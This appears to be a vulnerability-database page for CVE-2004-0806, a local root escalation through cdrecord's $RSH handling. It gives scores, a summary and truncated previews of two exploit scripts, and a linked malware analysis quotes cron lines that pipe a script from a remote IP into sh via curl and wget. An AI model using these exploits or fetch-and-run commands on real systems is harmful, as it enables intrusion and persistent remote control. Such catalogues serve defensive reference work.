CVE-2004-0806

Published: 31/12/2004 Updated: 11/10/2017
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 730
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

cdrecord in the cdrtools package prior to 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.

Vulnerable Product

cdrtools cdrecord 1.11

cdrtools cdrecord 2.0

Exploits

#!/bin/bash echo "readcd-expsh -- ReadCD local exploit ( Test on cdrecord-201-0a272mdk)" echo "Author : newbug [at] chrootorg" echo "Date :09132004" echo "IRC : ircchrootorg #discuss" export READCD=/usr/bin/readcd cd /tmp cat > sc <<_EOF_ #include <unistdh> #include <sys/typesh> #include <stdioh> int main ...
#!/bin/bash # # cdrecord-suidshellsh - I)ruid [CAU] (092004) # # Exploits cdrecord's exec() of $RSH before dropping privs # cat > /cpbinbashc << __EOF__ #include <stdioh> #include <sys/typesh> #include <sys/stath> #include <fcntlh> main( int argc, char *argv[] ) { int fd1, fd2; int count; char buffer[1]; ...

Github Repositories

notes of scripts

VirusShare_775b04d9458a409e82ef05fb1b3dcc95sh Summary This script stops any firewalls, configures DNS server as 8888 Then, it sets /var/spool/cron/root to execute specific command The commands are: "*/5 * * * * curl -fsSL 18524425191/ish | sh" */5 * * * * wget -q -O- 18524425191/ish | sh Then, it cre